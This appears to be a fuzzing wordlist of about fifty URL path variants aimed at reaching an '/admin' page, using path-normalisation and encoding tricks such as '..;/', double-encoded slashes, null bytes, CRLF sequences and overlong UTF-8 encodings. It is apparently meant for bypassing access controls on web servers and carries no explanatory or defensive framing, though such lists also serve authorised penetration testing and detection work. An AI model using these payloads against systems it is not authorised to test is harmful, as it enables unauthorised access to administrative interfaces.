/..;/admin
/..;/admin/
/;/admin
/.;/admin
/./admin
//admin
/admin/
/Admin
/ADMIN
/aDmIn
/admin%20
/admin%09
/admin%0d%0a
/admin%00
/admin..
/admin;
/admin.
/admin..;
/admin.html
/admin.json
/admin?
/admin#
/admin/*
/admin/./
/admin/../admin
/%2e/admin
/%2e%2e/admin
/admin%252f
/../admin
/.%00/admin
/admin%23
/admin%3b
/admin%2f
/./admin/./
/admin/..%00/
/admin/..%0d/
/admin/..;/
/admin/.%2e/
/admin/%2e./
/admin/%2e%2e/
%2f%61%64%6d%69%6e
/admin/~
/admin;x=y
/admin#fragment
/static/..%2f..%2fadmin
/static/..%252f..%252fadmin
/anything/../admin
/literal/../admin/
/..%c0%af/admin
/..%ef%bc%8f/admin
/..%c1%9c/admin
/..%e0%80%af/admin
/..%f0%80%80%af/admin
